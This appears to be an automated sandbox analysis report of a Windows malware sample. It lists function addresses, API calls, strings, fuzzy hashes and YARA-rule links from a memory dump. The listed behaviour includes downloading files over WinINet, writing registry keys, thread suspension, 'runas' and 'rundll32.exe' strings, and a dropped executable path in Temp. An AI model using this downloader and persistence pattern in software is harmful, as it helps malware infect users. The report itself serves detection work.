Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID: <$Microsoft Internet Explorer$runas
API String ID: 4294395943-436926838
Opcode ID: 014995774efd9cb3be767c7610611f350452802a3e6ebf8bebf6023c6a8670b3
Instruction ID: 2b5c1717c82cf1bcfaee824813c5aa76ccd2e0675d1c39cd98a8590ea6e24510
Opcode Fuzzy Hash: 014995774efd9cb3be767c7610611f350452802a3e6ebf8bebf6023c6a8670b3
Instruction Fuzzy Hash: 8F410431E00219ABDB18DF64CD85BAEBB79EF85300F10807AE511B72D1D77CAA41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00416DDA, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416DF0

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,004156FE), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(?,?,004156FE), ref: 00416629

_free.LIBCMT ref: 00416DFC
_free.LIBCMT ref: 00416E07
_free.LIBCMT ref: 00416E12
_free.LIBCMT ref: 00416E1D
_free.LIBCMT ref: 00416E28
_free.LIBCMT ref: 00416E33
_free.LIBCMT ref: 00416E3E
_free.LIBCMT ref: 00416E49
_free.LIBCMT ref: 00416E57

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1fcfb7d0ffea5263bcad58445cfe15267b6c93876006fca3dd3a00027fdf9090
Instruction ID: 9ac12997f409e09f284fb3084e283640f1bc5f5bb484a064226b56a85c72038b
Opcode Fuzzy Hash: 1fcfb7d0ffea5263bcad58445cfe15267b6c93876006fca3dd3a00027fdf9090
Instruction Fuzzy Hash: FF219A76900108EFCB41EF95C841DDE7BB9FF08345F0141AAF9159B121EB36EA94CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00410A40, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00410A77
___except_validate_context_record.LIBVCRUNTIME ref: 00410A7F
_ValidateLocalCookies.LIBCMT ref: 00410B08
__IsNonwritableInCurrentImage.LIBCMT ref: 00410B33
_ValidateLocalCookies.LIBCMT ref: 00410B88

Strings

csm, xrefs: 00410BB1
csm, xrefs: 00410B1D

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
Opcode ID: 5cdd865d4eea417760e40e966f6d40f233c376454c0fc9c2000f3368be955130
Instruction ID: 1e29f4121bd5bb4e6d42b0bcf92c1ff488988dd6b5532fa52b85bb20cecc90e3
Opcode Fuzzy Hash: 5cdd865d4eea417760e40e966f6d40f233c376454c0fc9c2000f3368be955130
Instruction Fuzzy Hash: 2D51B534A00209DFCF14DF59D840ADE7BB5AF44318F1481ABE8155B392D7B9E9C2CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004171AC, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 00417203
ext-ms-, xrefs: 00417217
r2A, xrefs: 004171AE

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-$r2A
API String ID: 0-2774189406
Opcode ID: c84a2b77935eb924aed648b2b7d3e40140daa0546c7905651bd106588082a50c
Instruction ID: 8f1c6e0094c6d3538ac87aa352488e327211543a1813d1f44e39b21f902c1d22
Opcode Fuzzy Hash: c84a2b77935eb924aed648b2b7d3e40140daa0546c7905651bd106588082a50c
Instruction Fuzzy Hash: 3221F631A4D220E7CB314B649C80EDB36789F557A0B2101A2FD16A7391D678DD4286E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF44, Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0041BF6E
_free.LIBCMT ref: 0041C047
_free.LIBCMT ref: 0041C074

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: be33620c23a60c3f761264a9f76e2e98c492430a9590dc69e3dc4c786f78e33f
Instruction ID: a7ab0755cdd5fcc2c1d94863c0793a6e5362be77a03ae0c127ee93c90d898f96
Opcode Fuzzy Hash: be33620c23a60c3f761264a9f76e2e98c492430a9590dc69e3dc4c786f78e33f
Instruction Fuzzy Hash: 6E5105709C4211AFDB20AFB58CC29FE7BA4AF05718F04416FE51097282EB3989C18B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0041E774, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E7F6
_free.LIBCMT ref: 0041E81A
_free.LIBCMT ref: 0041E9A7
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042B608), ref: 0041E9B9
_free.LIBCMT ref: 0041EB73

Strings

rA, xrefs: 0041E962, 0041EA7D, 0041E968

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$InformationTimeZone
String ID: rA
API String ID: 597776487-1436421378
Opcode ID: 8df1490c548fdd117110b597a22460883a2def109089ff63baa0a3300c23121f
Instruction ID: 1857a6ca183768391e0a52e0c310cfa39c40fc20d62c3d7fb1d0d8c0ecb42507
Opcode Fuzzy Hash: 8df1490c548fdd117110b597a22460883a2def109089ff63baa0a3300c23121f
Instruction Fuzzy Hash: 73C15879A002049BDB20AF6BCC41BEABBA9AF46354F14406FEC90D7391E7389DC1C758

Uniqueness

Uniqueness Score: -1.00%

Function 00406C14, Relevance: 10.7, APIs: 7, Instructions: 247networkfileCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00406C23
HttpSendRequestA.WININET(00000000,00000000,?), ref: 00406CCC
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 00406D5D
InternetReadFile.WININET(00000000,00000000,000003FF,?), ref: 00406DE4
InternetCloseHandle.WININET(00000000), ref: 00406DF5
InternetCloseHandle.WININET(?), ref: 00406DFA
InternetCloseHandle.WININET(?), ref: 00406DFF

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$FileHttpReadRequest$OpenSend
String ID:
API String ID: 856522067-0
Opcode ID: e7ac236ab661de99c233abc602699f116f5a62d8639283a14c1c69ac43ce9b9e
Instruction ID: 52459d0660ed3093255d823bacb1dc5439dd309aea7df211bb5b3be69d86775e
Opcode Fuzzy Hash: e7ac236ab661de99c233abc602699f116f5a62d8639283a14c1c69ac43ce9b9e
Instruction Fuzzy Hash: DB813931600104AFEB18DF28CD85BAE7B76EF82304F10417EF811E72D2D7399A918B99

Uniqueness

Uniqueness Score: -1.00%

Function 00412943, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00412875), ref: 00412965
GetFileInformationByHandle.KERNEL32(?,?), ref: 004129BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00412875,?,000000FF,00000000,00000000), ref: 00412A4D
__dosmaperr.LIBCMT ref: 00412A54
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00412A91

Part of subcall function 00412CB9: __dosmaperr.LIBCMT ref: 00412CEE

Strings

u(A, xrefs: 0041295D

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID: u(A
API String ID: 1206951868-4059933701
Opcode ID: 58d514ce71a8e6a33e4f887e46c7aea06544bd8176ccff21c16d36e488857773
Instruction ID: eb81c5419ffea4406b0efb4a1d543400d364a86dfd5a8c9f72f57ba91cdce05f
Opcode Fuzzy Hash: 58d514ce71a8e6a33e4f887e46c7aea06544bd8176ccff21c16d36e488857773
Instruction Fuzzy Hash: 44418C71900604AFCB34DFA6DD459EFBBF9EF88340B04452EF856D3610E678A891CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00406980, Relevance: 10.6, APIs: 7, Instructions: 105networkfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,7053FB10), ref: 004069B5
InternetOpenA.WININET(0042CD15,00000000,00000000,00000000,00000000), ref: 004069CA
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004069EA
InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 00406A01
CloseHandle.KERNEL32(00000000), ref: 00406A43
InternetCloseHandle.WININET(?), ref: 00406A52
InternetCloseHandle.WININET(00000000), ref: 00406A55

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$FileOpen$CreateRead
String ID:
API String ID: 4113138902-0
Opcode ID: a2282ce977b7c28b323d50f556ce143bf23065525147ebe1300c2276d3fa925d
Instruction ID: 7bbf74387ac1a1207ef8182909c572310c4a0c5f5293c1f06448d650960ae187
Opcode Fuzzy Hash: a2282ce977b7c28b323d50f556ce143bf23065525147ebe1300c2276d3fa925d
Instruction Fuzzy Hash: 1531B771340208BBEB20DF64CC85FDE3768EB48704F604129F905A71D1D7B8E9958B68

Uniqueness

Uniqueness Score: -1.00%

Function 0041C8A8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0041C870: _free.LIBCMT ref: 0041C895

_free.LIBCMT ref: 0041C8F6

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,004156FE), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(?,?,004156FE), ref: 00416629

_free.LIBCMT ref: 0041C901
_free.LIBCMT ref: 0041C90C
_free.LIBCMT ref: 0041C960
_free.LIBCMT ref: 0041C96B
_free.LIBCMT ref: 0041C976
_free.LIBCMT ref: 0041C981

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
Instruction ID: f2b93970fb6e2aef318e5f2c4523945811294bca4e2481cfb0b80df0a2661d87
Opcode Fuzzy Hash: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
Instruction Fuzzy Hash: D41172715D0704EAD920B7B2CCC7FCBB79D5F01705F40082EB299A6052EB39F5958698

Uniqueness

Uniqueness Score: -1.00%

Function 00418457, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00403D80,00000000), ref: 0041849F
__fassign.LIBCMT ref: 0041867E
__fassign.LIBCMT ref: 0041869B
WriteFile.KERNEL32(?,00403D80,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004186E3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00418723
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004187CF

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 3d18f7db7c56568068549e495852605dff7264c00d022ca4997336bbe7a27b68
Instruction ID: beb5861e4abce14f06dcd24397d210cd9645b43e00d7a8697286e935f53395e2
Opcode Fuzzy Hash: 3d18f7db7c56568068549e495852605dff7264c00d022ca4997336bbe7a27b68
Instruction Fuzzy Hash: D0D18D75D002589FCB15CFA8C8809EEBBB5EF49314F28416EE865B7341DB34AD86CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00410E44, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00410E3B,00410CA9,004105B7), ref: 00410E52
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00410E60
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00410E79
SetLastError.KERNEL32(00000000,00410E3B,00410CA9,004105B7), ref: 00410ECB

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6c03938069e6b7b23674db80bc579b142826eceee62ccf849c52df2d9d81859c
Instruction ID: fbdea789013a358475f0cb85031c656012928e6e563f3a8a68490c708a0442e9
Opcode Fuzzy Hash: 6c03938069e6b7b23674db80bc579b142826eceee62ccf849c52df2d9d81859c
Instruction Fuzzy Hash: 2B01FC336097115DE72427777D85AD72A68EB05779B20073FF514902F2EFAA4CC1514C

Uniqueness

Uniqueness Score: -1.00%

Function 00402890, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127threadsleepinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 0040EF20: Concurrency::cancel_current_task.LIBCPMT ref: 0040F041

CreateThread.KERNEL32 ref: 004028F6
Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?), ref: 00402903
SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040290A

Strings

runas, xrefs: 00402A4F
rundll32.exe, xrefs: 00402C7C

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
String ID: runas$rundll32.exe
API String ID: 1039963361-4081450877
Opcode ID: 39a2ac4f29380bd03ab55cfe1eaf93f9538f8641d48a1193940696d82a9f2568
Instruction ID: 9789403ed1d8a60cfd9dcce85231cf1f3a960594b6cceb2f2029b4867e38d107
Opcode Fuzzy Hash: 39a2ac4f29380bd03ab55cfe1eaf93f9538f8641d48a1193940696d82a9f2568
Instruction Fuzzy Hash: 4E411671310248ABEB18CF28CE89B9D3B56EF86314F50863AF845A72D6C77DD4C08B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041B498, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe, xrefs: 0041B49D

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
API String ID: 0-1917590862
Opcode ID: e2d97424e3a508744fe96a92562ac19905b758676d77620d087c3d645e5d4e0e
Instruction ID: a6d91d72e78203765ee6c05f39fb8ce87f556eb1b606fad4f5d0dc189e3d53dc
Opcode Fuzzy Hash: e2d97424e3a508744fe96a92562ac19905b758676d77620d087c3d645e5d4e0e
Instruction Fuzzy Hash: 7D21D471204205BF9B20AF668C84DEB776DEF0036D710852AF925C7251E738ED8187E9

Uniqueness

Uniqueness Score: -1.00%

Function 00412C0B, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00412C4D

Strings

.bat, xrefs: 00412C7C
.cmd, xrefs: 00412C6B
.com, xrefs: 00412C8D
.exe, xrefs: 00412C5A

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 15a5f3288f9aaf355dc4e93a79ae344d8195a868944644686aa35fb8295601a0
Instruction ID: c759ddb5ac90f6ab1ac45928bbaba56c44597eec320416e9b8e49e92896b9161
Opcode Fuzzy Hash: 15a5f3288f9aaf355dc4e93a79ae344d8195a868944644686aa35fb8295601a0
Instruction Fuzzy Hash: A401A13770C726252A14505AAF027AF53A98F91BB8726012FF958F72C1FECCD9A251DC

Uniqueness

Uniqueness Score: -1.00%

Function 00411154, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 004111A4

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: b8ecf89c5f3d7a2f7767fdd90ce932ffd2d4c5eb1bfd891279011bf3ca49a564
Instruction ID: 61928d99341b51059aac123d8b34d2618907a57ee03d50c70aaf2b2d1c785a30
Opcode Fuzzy Hash: b8ecf89c5f3d7a2f7767fdd90ce932ffd2d4c5eb1bfd891279011bf3ca49a564
Instruction Fuzzy Hash: 1711BC35B0A225FBCB324B649C84B9BB7589F09760B110162EF05A7370D634DD41C5E8

Uniqueness

Uniqueness Score: -1.00%

Function 00409700, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040AE02
std::_Xinvalid_argument.LIBCPMT ref: 0040AE2A

Strings

stoi argument out of range, xrefs: 0040AE2F
:::, xrefs: 00409729
invalid stoi argument, xrefs: 0040ADFD, 0040AE25

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_
String ID: :::$invalid stoi argument$stoi argument out of range
API String ID: 909987262-1139504419
Opcode ID: 5737274716fd9a51b80d375ca3381b645ccddd5e5ba34d62c5c3cc6000be7412
Instruction ID: 527d07b7bc9dc712a2708bc5c541f2dd108390a836250cedb0de7cf25f304afe
Opcode Fuzzy Hash: 5737274716fd9a51b80d375ca3381b645ccddd5e5ba34d62c5c3cc6000be7412
Instruction Fuzzy Hash: 40F0D670A04219A7DB20BF99D846B8D7BA56F40304F60013DF814379C2CBFD24488BEE

Uniqueness

Uniqueness Score: -1.00%

Function 00412203, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004121F8,?,?,004121C0,?,?,?), ref: 00412218
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041222B
FreeLibrary.KERNEL32(00000000,?,?,004121F8,?,?,004121C0,?,?,?), ref: 0041224E

Strings

mscoree.dll, xrefs: 00412211
CorExitProcess, xrefs: 00412223

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2507951d6d1a2487d55b9b793432bce96fc35d87bb98e2533eabd8f79f8650fc
Instruction ID: 6250f0f5c9219dab05e05ccb32d3a9bd397d453599b4be5e81b1812bfa653797
Opcode Fuzzy Hash: 2507951d6d1a2487d55b9b793432bce96fc35d87bb98e2533eabd8f79f8650fc
Instruction Fuzzy Hash: 99F08230708219FBDB219B50DE0ABDEBA68EF40755F5000A1F800E12A0CB788E55DA98

Uniqueness

Uniqueness Score: -1.00%

Function 00404010, Relevance: 7.7, APIs: 5, Instructions: 212COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 00404066

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: c3cb2006693ccb68f534731fb5d64ab8942f70303ea8741ba3f4b5d73e7881b6
Instruction ID: b371649bb40ff306e1de84d05d589500809cdc2563602c5c47cba8bc4f1b1ea5
Opcode Fuzzy Hash: c3cb2006693ccb68f534731fb5d64ab8942f70303ea8741ba3f4b5d73e7881b6
Instruction Fuzzy Hash: 2461F6B1E092089BEB20DB69DC4979DB7B4EB95314F5002BBED00A73C1E779898087C9

Uniqueness

Uniqueness Score: -1.00%

Function 00403DDB, Relevance: 7.7, APIs: 5, Instructions: 202registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 00403DF9
RegCloseKey.ADVAPI32(?,?,00000400,00000000,00000001,?), ref: 00403E02
RegCreateKeyExA.ADVAPI32(80000001,00000001,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00403EF1
RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,00000002,80000001), ref: 00403F10
RegSetValueExA.ADVAPI32(80000001,?,00000000,00000001,?,?), ref: 00403F3E

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Value$CloseCreateOpenQuery
String ID:
API String ID: 980562271-0
Opcode ID: 6f3d077b9baa10081d0304ca2a6cf2678f88ce2d9c15ab3f9ebebaff3ec3fe1d
Instruction ID: 3db5c24ff4330d4217f16a07ecd351cc3998b2e9ea5779ea41a4dde77d0d3408
Opcode Fuzzy Hash: 6f3d077b9baa10081d0304ca2a6cf2678f88ce2d9c15ab3f9ebebaff3ec3fe1d
Instruction Fuzzy Hash: 22610A71210109AFEB18CF28CD85BDE7B36EB45305F50822DF905A72D1D779DA858B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406A0B, Relevance: 7.6, APIs: 5, Instructions: 140networkfileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406A27
InternetReadFile.WININET(?,?,?,?), ref: 00406A38
CloseHandle.KERNEL32(00000000), ref: 00406A43
InternetCloseHandle.WININET(?), ref: 00406A52
InternetCloseHandle.WININET(00000000), ref: 00406A55

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandleInternet$File$ReadWrite
String ID:
API String ID: 567989605-0
Opcode ID: 3832b2fb4b009ccbba65734382b5daed31d65e0f69c913fa90d0c1df578f881e
Instruction ID: ed13829d9ea2e3f4af9c26aed155592a4dca76da089bc68e82b317d2a8f303b8
Opcode Fuzzy Hash: 3832b2fb4b009ccbba65734382b5daed31d65e0f69c913fa90d0c1df578f881e
Instruction Fuzzy Hash: EE41C072A00109ABDF14DFA4CD85AEE7779EB45314F50423AF816F32D1D638EA94CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041C807, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041C81F

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,004156FE), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(?,?,004156FE), ref: 00416629

_free.LIBCMT ref: 0041C831
_free.LIBCMT ref: 0041C843
_free.LIBCMT ref: 0041C855
_free.LIBCMT ref: 0041C867

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5d0a5859f4b37fc9e185064ffee58ad4f855eb3b6b6ae4a5b76935e3f7635b51
Instruction ID: b5e720d29d004bd2e01f4418257483c3524fdb12780781c823b448491ab4452d
Opcode Fuzzy Hash: 5d0a5859f4b37fc9e185064ffee58ad4f855eb3b6b6ae4a5b76935e3f7635b51
Instruction Fuzzy Hash: F3F0FF32554210E78624FB99E9C5C96B3DDAA04715755182FF049D7611CB39FCC08AEC

Uniqueness

Uniqueness Score: -1.00%

Function 0041AED3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041B06D

Strings

*?, xrefs: 0041AF16

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 2443434e187e1b979bea4c483cc1f5e7adc4037d4bb0d9801d41bb1f01b7c5b1
Instruction ID: 4ffa33ded46cd296a401573387ca96fd095d181656e3ac683cd04d08089812ad
Opcode Fuzzy Hash: 2443434e187e1b979bea4c483cc1f5e7adc4037d4bb0d9801d41bb1f01b7c5b1
Instruction Fuzzy Hash: 806131B5E002199FDB14CFA9C8815EEFBF5EF48314B25416AE815F7300D7759E818B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041E94F, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042B608), ref: 0041E9B9
_free.LIBCMT ref: 0041E9A7

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,004156FE), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(?,?,004156FE), ref: 00416629

_free.LIBCMT ref: 0041EB73

Strings

rA, xrefs: 0041E962, 0041EA7D, 0041E968

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: rA
API String ID: 2155170405-1436421378
Opcode ID: 51343a09341bbe93d28f5f48e0d6f70d57690a0a3075e6f1d7afcad49f7eb1f2
Instruction ID: 8f49c8c0b6aa7a82d0b5abe53b8f79067eb707d5a1f040f0b603246c05aad08d
Opcode Fuzzy Hash: 51343a09341bbe93d28f5f48e0d6f70d57690a0a3075e6f1d7afcad49f7eb1f2
Instruction Fuzzy Hash: 8E51F875D002199BDB10EB67DC819EE77BCAF45354B14026FE921D32A1E738AEC18B58

Uniqueness

Uniqueness Score: -1.00%

Function 00408230, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004096BD
std::_Xinvalid_argument.LIBCPMT ref: 004096E5

Strings

stoi argument out of range, xrefs: 004096EA
invalid stoi argument, xrefs: 004096B8, 004096E0

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_
String ID: invalid stoi argument$stoi argument out of range
API String ID: 909987262-1606216832
Opcode ID: 167b5389a7afd7573001b1ae48082cb73eafee0f744838704f6bddc74670aa7d
Instruction ID: 0e859e189306dfac269b48f5686db12ac90611519aef9a0c34cbe99993dfa055
Opcode Fuzzy Hash: 167b5389a7afd7573001b1ae48082cb73eafee0f744838704f6bddc74670aa7d
Instruction Fuzzy Hash: BBF05B71944318A7EB20BFA5CC477CD7BB8AF01344F51003BF91433582D7B959448AE6

Uniqueness

Uniqueness Score: -1.00%

Function 00417645, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17fileCOMMON

